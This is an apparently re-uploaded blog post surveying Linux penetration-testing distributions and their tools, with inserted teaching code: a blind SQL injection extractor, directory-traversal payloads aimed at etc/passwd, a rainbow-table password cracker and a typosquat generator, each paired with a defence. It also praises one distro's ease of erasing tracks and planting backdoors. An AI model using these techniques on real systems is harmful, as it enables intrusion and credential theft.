Best Tool Pentesting

Upload: armanda-cruz-neto

Post on 08-Aug-2018


8/22/2019 Best Tool Pentesting

1. BackTrack 5 R3

The mother of them all, or at least the best known of the Linux pentesting distros. BackTrack has a very cool strapline: "The quieter you become, the more you are able to hear." That just sounds cool.

BackTrack is based on the ever-popular Ubuntu. The pentesting distro used to be available only with a KDE desktop, but GNOME was added as an option with the release of BackTrack 5. For those working in information security or intrusion detection, BackTrack is one of the most popular pentesting distros that can run from a live CD or flash drive. The distribution is ideal for wireless cracking, exploitation, web application assessment, learning, or social-engineering a client.

Here is a list of some of the awesome tools available in BackTrack 5 R3, the latest release at the time of writing. (BackTrack has since been retired; its successor from the same team is Kali Linux, which carries most of these tools forward.)

To identify live hosts:

dnmap: distributed Nmap

address6: IPv6 address conversion tool

Information Gathering Analysis (Social Engineering)

Jigsaw: grabs information about company employees

Uberharvest: email harvester

sslcaudit: SSL certificate audit

VoIP honey: VoIP honeypot

urlcrazy: generates and checks the URL typos used in typosquatting, URL hijacking and phishing
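To make concrete what a tool like urlcrazy does, here is an added example (written for this page, not urlcrazy's own code) that generates single-edit typosquat candidates for a domain and checks whether a domain seen in DNS or proxy logs is one of them. The keyboard-adjacency and look-alike tables are constructed subsets, and the domain names are made up.

```python
"""Typosquat candidate generation in the spirit of urlcrazy (added example,
not urlcrazy's own code). Everything here is constructed for illustration."""

# Constructed QWERTY adjacency map used for "fat-finger" substitutions.
ADJACENT = {
    "a": "qwsz", "b": "vghn", "c": "xdfv", "d": "serfcx", "e": "wsdr",
    "f": "drtgvc", "g": "ftyhbv", "h": "gyujnb", "i": "ujko", "j": "huikmn",
    "k": "jiolm", "l": "kop", "m": "njk", "n": "bhjm", "o": "iklp",
    "p": "ol", "q": "wa", "r": "edft", "s": "awedxz", "t": "rfgy",
    "u": "yhji", "v": "cfgb", "w": "qase", "x": "zsdc", "y": "tghu",
    "z": "asx",
}

# ASCII look-alikes (a constructed subset; real tools also cover Unicode homoglyphs).
HOMOGLYPHS = {
    "l": ["1", "i"], "i": ["l", "1"], "o": ["0"], "0": ["o"],
    "rn": ["m"], "m": ["rn"], "vv": ["w"], "w": ["vv"],
}


def split_domain(domain):
    """'example.com' -> ('example', 'com'); only the label is mutated."""
    label, dot, tld = domain.lower().rpartition(".")
    if not dot:
        return tld, ""          # no TLD given, treat the whole string as the label
    return label, tld


def omissions(label):
    return {label[:i] + label[i + 1:] for i in range(len(label))}


def transpositions(label):
    return {label[:i] + label[i + 1] + label[i] + label[i + 2:]
            for i in range(len(label) - 1) if label[i] != label[i + 1]}


def repetitions(label):
    return {label[:i] + label[i] + label[i:] for i in range(len(label))}


def adjacent_substitutions(label):
    return {label[:i] + alt + label[i + 1:]
            for i, ch in enumerate(label) for alt in ADJACENT.get(ch, "")}


def homoglyph_substitutions(label):
    out = set()
    for src, alts in HOMOGLYPHS.items():
        start = label.find(src)
        while start != -1:
            for alt in alts:
                out.add(label[:start] + alt + label[start + len(src):])
            start = label.find(src, start + 1)
    return out


GENERATORS = (omissions, transpositions, repetitions,
              adjacent_substitutions, homoglyph_substitutions)


def typosquat_candidates(domain):
    """All single-edit candidates for `domain`, sorted, excluding the original."""
    label, tld = split_domain(domain)
    candidates = set()
    for gen in GENERATORS:
        candidates |= gen(label)
    candidates.discard(label)
    candidates.discard("")      # omitting the only character of a 1-char label
    return sorted(f"{c}.{tld}" if tld else c for c in candidates)


def is_squat_of(observed, watched):
    """Detection use: does a domain seen in logs look like a squat of `watched`?"""
    return observed.lower() in set(typosquat_candidates(watched))


if __name__ == "__main__":
    for d in typosquat_candidates("example.com")[:10]:
        print(d)
    print(is_squat_of("exmaple.com", "example.com"))
```

The candidate list is what you would feed to a DNS resolver or WHOIS client to find which variants are already registered; the `is_squat_of` check is the defensive use of the same generator, run over outbound DNS or proxy logs.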

Web Crawlers

Apache_users: Apache username enumerator

Deblaze: performs enumeration and interrogation against Flash remoting endpoints


Database Analysis

Tnscmd10g: lets you send commands to an Oracle TNS listener

BBQSQL: blind SQL injection toolkit

* If you are interested in database security, see our Hacker Halted summary here.
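Blind SQL injection is worth seeing in code rather than only as a toolkit name. The example below is added here and is not BBQSQL's code: a deliberately vulnerable lookup over a constructed in-memory SQLite table leaks only whether a row matched, and that single bit is enough to read the admin password character by character. The table contents and the `vulnerable_lookup` / `safe_lookup` functions are assumptions for illustration.

```python
"""Boolean-based blind SQL injection against a constructed target (added
example, not BBQSQL's code). An in-memory SQLite database stands in for the
application's backend; only the row-or-no-row signal leaks to the attacker."""
import sqlite3

_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
_conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                  [(1, "admin", "s3cr3t"), (2, "bob", "hunter2")])
_conn.commit()


def vulnerable_lookup(user_id: str) -> bool:
    """The deliberately vulnerable endpoint: input is concatenated into SQL and
    the caller learns only whether some row matched."""
    query = f"SELECT id FROM users WHERE id = {user_id}"
    try:
        return _conn.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False


def safe_lookup(user_id: str) -> bool:
    """Hardened version: validate the type and bind the value as a parameter,
    so whatever the client sends is data, never SQL."""
    try:
        uid = int(user_id)
    except ValueError:
        return False
    row = _conn.execute("SELECT id FROM users WHERE id = ?", (uid,)).fetchone()
    return row is not None


def oracle(condition: str) -> bool:
    """Ask the vulnerable endpoint a yes/no question about the database."""
    return vulnerable_lookup(f"1 AND ({condition})")


def extract_string(expr: str, max_len: int = 64) -> str:
    """Recover the value of an SQL scalar expression one character at a time.
    Each character costs one probe to detect end-of-string plus a binary search
    over the 7-bit range, so about 8 oracle requests per character."""
    result = ""
    for pos in range(1, max_len + 1):
        char_expr = f"unicode(substr(({expr}),{pos},1))"
        # substr() past the end returns '' and unicode('') is NULL, so this
        # comparison is false exactly when the string has ended.
        if not oracle(f"{char_expr} > 0"):
            break
        lo, hi = 1, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"{char_expr} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


def dump_admin_password() -> str:
    return extract_string("SELECT password FROM users WHERE name = 'admin'")


if __name__ == "__main__":
    print("recovered:", dump_admin_password())
    print("vulnerable:", vulnerable_lookup("99 OR 1=1"),
          "safe:", safe_lookup("99 OR 1=1"))
```

The same binary search is what the real toolkits automate over HTTP, with the oracle being a difference in status code, page length or response time instead of a local function call. Against `safe_lookup` the whole approach fails at the first probe, because `1 AND (...)` is not an integer.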

Bluetooth Analysis

Blueranger: uses link quality to locate Bluetooth devices

Vulnerability Assessment

Lynis: scans systems and software for security issues

DotDotPwn: directory traversal fuzzer
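A traversal fuzzer such as DotDotPwn is mostly a payload generator plus a way to tell which payloads escaped the web root. The added example below (not DotDotPwn's payload list or code) builds a small set of encoded `../` variants, runs them through a typical broken filter and through a hardened resolver, and reports which ones land outside the root. The web root, the filter and the variant list are constructed for this example.

```python
"""Directory-traversal fuzzing in the spirit of DotDotPwn (added example, not
the tool's own payload list): generated payloads are run through a typical
broken filter and through a hardened resolver, and any payload that lands
outside the web root is reported."""
import posixpath
from urllib.parse import unquote

# Constructed subset of traversal encodings: plain, backslash, URL-encoded,
# double-encoded and the "....//" form that survives a single strip of "../".
DOT_DOT_VARIANTS = ["../", "..\\", "..%2f", "%2e%2e/", "%2e%2e%2f",
                    "..%252f", "....//", "..%c0%af"]


def traversal_payloads(target="etc/passwd", max_depth=4):
    """Candidate request paths that try to climb out of the web root."""
    for depth in range(1, max_depth + 1):
        for variant in DOT_DOT_VARIANTS:
            yield variant * depth + target


def inside_root(root: str, path: str) -> bool:
    root = posixpath.normpath(root)
    return path == root or path.startswith(root + "/")


def naive_resolve(root: str, user_path: str) -> str:
    """A common broken filter: decode once, strip '../' once, serve the rest."""
    cleaned = unquote(user_path).replace("../", "")
    return posixpath.normpath(posixpath.join(root, cleaned))


def hardened_resolve(root: str, user_path: str):
    """Decode until stable, normalise, then check the result is still under
    root. Returns the path to serve, or None to reject the request."""
    decoded = user_path
    for _ in range(3):                      # collapse double/triple encoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = decoded.replace("\\", "/").lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    return candidate if inside_root(root, candidate) else None


def fuzz(resolver, root="/var/www/html"):
    """Payloads for which `resolver` would serve a file outside `root`."""
    hits = []
    for payload in traversal_payloads():
        resolved = resolver(root, payload)
        if resolved is not None and not inside_root(root, resolved):
            hits.append(payload)
    return hits


if __name__ == "__main__":
    print("naive filter leaks:", fuzz(naive_resolve))
    print("hardened resolver leaks:", fuzz(hardened_resolve))
```

The naive filter stops the plain `../` form but not `....//`, because stripping `../` out of `....//` leaves `../` behind. The hardened resolver decides after decoding and normalising, not before, which is the property to check for. This is string-level only: a real file server should also resolve symlinks (`os.path.realpath`) before making the containment check, since a link inside the root can still point outside it.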

Exploitation Tools

Netgear-telnetable: enables the Telnet console on Netgear devices

Terminator: smart meter tester

Htexploit: tool to bypass standard directory protection

Jboss-Autopwn: deploys a JSP shell on target JBoss servers

Websploit: scans and analyses remote systems for vulnerabilities

Wireless Exploitation Tools

Bluepot: Bluetooth honeypot

Spooftooph: spoofs or clones Bluetooth devices

Smartphone-Pentest-Framework

Fern-Wifi-cracker: GUI for testing wireless encryption strength

Wi-fihoney: creates fake APs using every encryption type and monitors them with airodump-ng

Wifite: automated wireless auditor

Password Tools

Creddump

Johnny

Manglefizz

Ophcrack

Phrasendresher

Rainbowcrack

Acccheck

smbexec
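Ophcrack and RainbowCrack both rely on precomputed hash chains, and the trick is easy to miss behind a tool name. The following added example, not code from either project, builds a miniature rainbow table for unsalted MD5 over four-letter lowercase passwords and then cracks a hash with it. Charset, chain length, number of chains and the seed strings are constructed for this illustration, and the hash is MD5 only because it is available everywhere; the mechanics are the same for the LM/NTLM tables Ophcrack ships.

```python
"""A miniature rainbow table (added example, not Ophcrack's or RainbowCrack's
code) for unsalted MD5 over 4-letter lowercase passwords. Parameters and seeds
are constructed for illustration; real tables are larger by many orders."""
import hashlib

CHARSET = "abcdefghijklmnopqrstuvwxyz"
PW_LEN = 4
SPACE = len(CHARSET) ** PW_LEN        # 456,976 possible passwords
CHAIN_LEN = 50                        # hash/reduce steps per chain
NUM_CHAINS = 60


def H(password: str) -> bytes:
    """The unsalted hash under attack."""
    return hashlib.md5(password.encode()).digest()


def salted_H(salt: str, password: str) -> bytes:
    """What a sane scheme stores: the salt moves the input out of the table's space."""
    return hashlib.md5((salt + password).encode()).digest()


def reduce_to_password(digest: bytes, step: int) -> str:
    """Map a digest back into the password space. Mixing in `step` gives every
    column its own reduction function, which is what makes the table 'rainbow'
    and keeps chains from merging as readily as single-function chains do."""
    n = (int.from_bytes(digest[:8], "big") + step) % SPACE
    chars = []
    for _ in range(PW_LEN):
        chars.append(CHARSET[n % len(CHARSET)])
        n //= len(CHARSET)
    return "".join(chars)


def chain_point(start: str, index: int) -> str:
    """The index-th plaintext of the chain beginning at `start` (index 0 = start)."""
    p = start
    for step in range(index):
        p = reduce_to_password(H(p), step)
    return p


def build_table(starts):
    """Precomputation: store only endpoint -> start points; the middle of each
    chain is recomputed on demand. Merged chains share an endpoint, so keep a list."""
    table = {}
    for start in starts:
        table.setdefault(chain_point(start, CHAIN_LEN), []).append(start)
    return table


def lookup(table, target: bytes):
    """Online phase: for each column hypothesis, walk the target to an endpoint;
    if the endpoint is known, rebuild that chain up to the column and verify.
    Costs O(CHAIN_LEN^2) hashes and no disk beyond the endpoint list."""
    for col in range(CHAIN_LEN - 1, -1, -1):
        x = reduce_to_password(target, col)
        for step in range(col + 1, CHAIN_LEN):
            x = reduce_to_password(H(x), step)
        for start in table.get(x, []):
            candidate = chain_point(start, col)
            if H(candidate) == target:      # rejects false alarms from merged chains
                return candidate
    return None


# Constructed, deterministic chain start points.
STARTS = [reduce_to_password(hashlib.md5(b"seed-%d" % i).digest(), 0)
          for i in range(NUM_CHAINS)]
TABLE = build_table(STARTS)


def crack(target: bytes):
    return lookup(TABLE, target)


if __name__ == "__main__":
    pw = chain_point(STARTS[0], 17)       # a password that is somewhere in the table
    print(pw, "->", crack(H(pw)))
    print("salted:", crack(salted_H("NaCl", pw)))
```

Only the endpoints are stored, so the table is tiny relative to what it covers, and that is the time/memory trade-off the real tools exploit at scale. A per-user salt defeats it outright: the hashed input is no longer one of the plaintexts any chain can contain, so `lookup` walks every column hypothesis and finds nothing.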


2. NodeZero

Like BackTrack, NodeZero is an Ubuntu-based distro used for penetration testing. It uses the Ubuntu repositories, so every time Ubuntu releases a patch you are also notified of system updates or upgrades. NodeZero used to be famous for including the THC IPv6 Attack Toolkit, which has tools like alive6, detect-new-ip6, dnsdict6, etc., but I think that these days BackTrack 5 R3 includes these tools too.

Whereas BackTrack is touted as a run-everywhere distro, i.e. one you run live, NodeZero Linux (which can also be run live) states that the distro's real strength comes from a hard install. NodeZero, in their own words, believes that a penetration tester requires a strong and efficient system, [achieved by using] a distribution that is a permanent installation, that benefits from a strong selection of tools, integrated with a stable Linux environment. Sounds cool. Ever tried it? Let us know in the comments below.


3. BackBox Linux

BackBox is getting more popular by the day. Like BackTrack and NodeZero, BackBox Linux is an Ubuntu-based distribution developed to perform penetration tests and security assessments. The developers state that the intention with BackBox is to create a pentesting distro that is fast and easy to use. BackBox has a pretty concise-looking desktop environment and seems to work very well. Like the other distros, BackBox is kept updated to the latest stable versions of the most often used and best-known ethical hacking tools through its repositories.

BackBox has all the usual suspects for forensic analysis, documentation and reporting, and reverse engineering, with tools like ettercap, john, metasploit, nmap, the Social-Engineer Toolkit (SET), sleuthkit, w3af, wireshark, etc.


4. Blackbuntu

Yes, as the name clearly suggests, this is yet another distro based on Ubuntu. Here is a list of the security and penetration testing tool categories available within the Blackbuntu package (each category has many sub-categories), which gives you a general idea of what comes with this pentesting distro: Information Gathering, Network Mapping, Vulnerability Identification, Penetration, Privilege Escalation, Maintaining Access, Radio Network Analysis, VoIP Analysis, Digital Forensics, Reverse Engineering and a Miscellaneous section. This list is hardly revolutionary, but the tools contained within might differ from those in the other distros.

5. Samurai Web Testing Framework

This is a live Linux distro that has been pre-configured with some of the best open source and free tools that focus on testing and attacking websites. (The difference with the Samurai Web Testing Framework is that it focuses on attacking, and therefore being able to defend, websites.) The developers outline four steps of a web pen-test. These steps are incorporated within the distro, which contains the necessary tools to complete each of them.

Step 1, Reconnaissance: tools include the Fierce domain scanner and Maltego.

Step 2, Mapping: tools include WebScarab and ratproxy.

Step 3, Discovery: tools include w3af and Burp.

Step 4, Exploitation: tools include BeEF, AJAXShell and much more.

Of interest as well, the live CD includes a pre-configured wiki, set up to be a central information store during your pen-test.

The Samurai Web Testing Framework is a live Linux distro that focuses on web application vulnerability research and web pentesting within a safe lab environment, i.e. so you can practise ethical hacking without violating any laws. This is a pentesting distro recommended for penetration testers who want to combine network and web app techniques.

6. Knoppix STD

This distro is based on Debian and originated in Germany. It targets the i486 architecture and runs the following desktops: GNOME, KDE, LXDE and also Openbox. Knoppix has been around for a long time now; in fact I think it was one of the original live distros. Knoppix is primarily designed to be used as a live CD, but it can also be installed on a hard disk. The STD in the name stands for Security Tools Distribution. The cryptography section is particularly well known in Knoppix STD.


7. Pentoo

Pentoo is a security-focused live CD based on Gentoo. In their own words, Pentoo is Gentoo with the pentoo overlay. So, if you are into Gentoo then this is the distro for you. Their homepage lists some of their customised tools and kernel, including: a hardened kernel with aufs patches, a WiFi stack backported from the latest stable kernel release, module loading support à la Slax, the XFCE4 window manager, and CUDA/OpenCL cracking support with development tools.

8. WEAKERTH4N

This penetration testing distribution is built from Debian Squeeze and uses Fluxbox for its desktop environment. This pentesting distro is particularly well adjusted for WiFi hacking, since it contains many wireless tools. Here is a quick summary of WEAKERTH4N's tool categories: WiFi attacks, SQL hacking, Cisco exploitation, password cracking, web hacking, Bluetooth, VoIP hacking, social engineering, information gathering, fuzzing, Android hacking, networking and shells.

9. Matriux Krypton

This Linux distro is, I believe, the first security distribution based directly on Debian (after WEAKERTH4N?); if I am wrong please comment below! It ships around 300 security tools, grouped into what the project calls arsenals. The arsenals cover penetration testing, ethical hacking, system and network administration, security testing, vulnerability analysis, cyber forensics investigations, exploiting, cracking and data recovery. The last category, data recovery, doesn't seem to be prevalent in the other distros.


10. DEFT

The latest version at the time of writing is DEFT 7, which is based on the new Linux kernel 3 and DART (Digital Advanced Response Toolkit). This distro is more oriented towards computer forensics and uses LXDE as its desktop environment and WINE for executing Windows tools under Linux. The developers (based in Italy) hope that their distro will be used by the military, police, investigators, IT auditors and professional penetration testers. DEFT is an abbreviation of Digital Evidence & Forensic Toolkit.

11. CAINE

A reader of our blog suggested adding CAINE, which we duly have. CAINE stands for Computer Aided INvestigative Environment and, like many information security products and tools, it is an Italian GNU/Linux live distribution. CAINE offers a comprehensive forensic environment that is organised to integrate existing software tools, composed as software modules, all displayed within a friendly graphical interface.

CAINE states three objectives: to ensure that the distro works in an interoperable environment that supports the digital investigator during the four phases of the digital investigation; to give the distro a user-friendly graphical interface; and to provide a semi-automated compilation of the final forensic report. As you would likely expect, CAINE is fully open source.

If anyone has used this please let us know.

12. Bugtraq

Bugtraq is another reader-submitted pentesting distro. Based on the 2.6.38 kernel, this distro offers a really wide range of penetration and forensic tools. Like most of the others in this list, Bugtraq can be hard-installed or, of course, run as a live DVD or from a USB drive. Bugtraq claims to have recently configured and updated the kernel for better performance, but also, importantly, so that it can recognise more hardware, including wireless injection patches for pentesting. The team at Bugtraq seem solid because they are clearly making an effort to get the kernel to work with more hardware, something on which the other distributions don't always place enough importance.

Some of the special features included with Bugtraq include (as stated) an expanded range of recognised injection-capable wireless drivers (i.e. not just the usual Alfa rtl8187), a patched 2.6.38 kernel and a solid installation of the usual suspects: Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira etc.


Unique to Bugtraq (as claimed on their site) is the ability, or better said the ease, of deleting tracks and backdoors. Just from having read about Bugtraq I'm really glad that I can add this to the list, because it just sounds like a job well done. If you are interested in any of the following pentesting and forensic categories, then do go and check out Bugtraq: malware, penetration shield, web audit, brute force attack, communication and forensics analytics, sniffers, virtualisation, anonymity and tracking, mapping and vulnerability detection.

Quick summary: you can't go wrong with any Ubuntu-based distro. BackTrack does the job well, but I guess, of course, it's all personal, i.e. does the distro do the job for you? Every penetration tester leans towards a particular tool or tool-set. Frankly they are all good, and it would be prudent to try several of these pentesting distros as live versions. For WiFi hacking, WEAKERTH4N is likely your better friend, whilst to stay within the law, use Samurai.

Bugtraq looks really good; the team behind it seems to have taken considerable time to tick all the boxes. Once we test it I'll update the post.

Here is a list of other distros (which we think are still alive and kicking; please correct us if we are wrong).

Other Distros

Damn Vulnerable Linux (reader comment: more of an operating system for attacking purposes)

Hakin9 (an educational and training distro that you can use to play along with when subscribing to Hakin9 magazine)

Helix

nUbuntu

Network Security Toolkit (NST)

OWASP Labrat

Frenzy

grml

Ophcrack

FCCU

OSWA Assistant

Russix

Chaox-NG

GnackTrack

Katana

Securix-NSM

Auditor

And here is a list of distros that, regrettably, have passed on to Linux heaven.

KCPentrix

Protech

FIRE

Arudius

INSERT

Local Area Security (LAS)

NavynOS

Operator

PHLAK

PLAC

SENTINIX

Talos

ThePacketMaster

Trinux

WarLinux

Whoppix

WHAX

HeX

Stagos FSE

SNARL